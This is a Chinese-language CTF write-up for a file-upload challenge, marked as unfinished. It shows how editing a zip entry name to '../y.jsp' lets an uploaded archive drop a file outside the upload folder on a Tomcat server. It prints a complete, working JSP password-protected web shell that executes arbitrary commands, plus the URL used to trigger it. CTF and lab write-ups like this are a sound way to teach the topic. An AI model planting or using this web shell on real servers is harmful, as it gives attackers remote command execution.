上传你的压缩包吧
解题过程
打开容器,可以进行文件上传,到需要是压缩包
随便上传一个压缩包,得到上传文件路径
:/usr/local/tomcat/webapps/ROOT/upload/b3eef5e5-0b95-4b1e-a837-684d3e248726.zip;Size:522;
比赛当时的思路是在一个博客上看到的,链接为ctf 文件上传总结_njqfb的博客-CSDN博客_ctf文件上传总结
我们可以将一个木马压缩为zip文件,然后用010editor修改几个字符(目录穿越),那么就可以在zip上一级目录生成木马文件
网上找的jsp一句话木马,利用方式为?pwd=023&cmd=ls
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {
StringBuilder line = new StringBuilder();try {
Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {
line.append(temp +"\\n");}buf.close();} catch (Exception e) {
line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){
out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{
out.println(":-)");}%>
添加到sk1y.zip,然后010editor进行修改,将其一前一后的sk1y.jsp使用调整为目录穿越 ,sk1y.jsp改为 ../y.jsp
然后上传该压缩包
然后访问
url/y.jsp?pwd=023&cmd=ls
木马可以正常运行之后,根据我们之前测试的zip文件上传回显的目录位置,进行搜索
测试压缩包的回显
/usr/local/tomcat/webapps/ROOT/upload/b3eef5e5-0b95-4b1e-a837-684d3e248726.zip;Size:522;
查看目录,发现flag.jsp
然后查看该文件,即可得到flag
但是有个问题,就是压缩包目录穿越的原理还不是很懂,之后理解的话会继续更新
未完待续——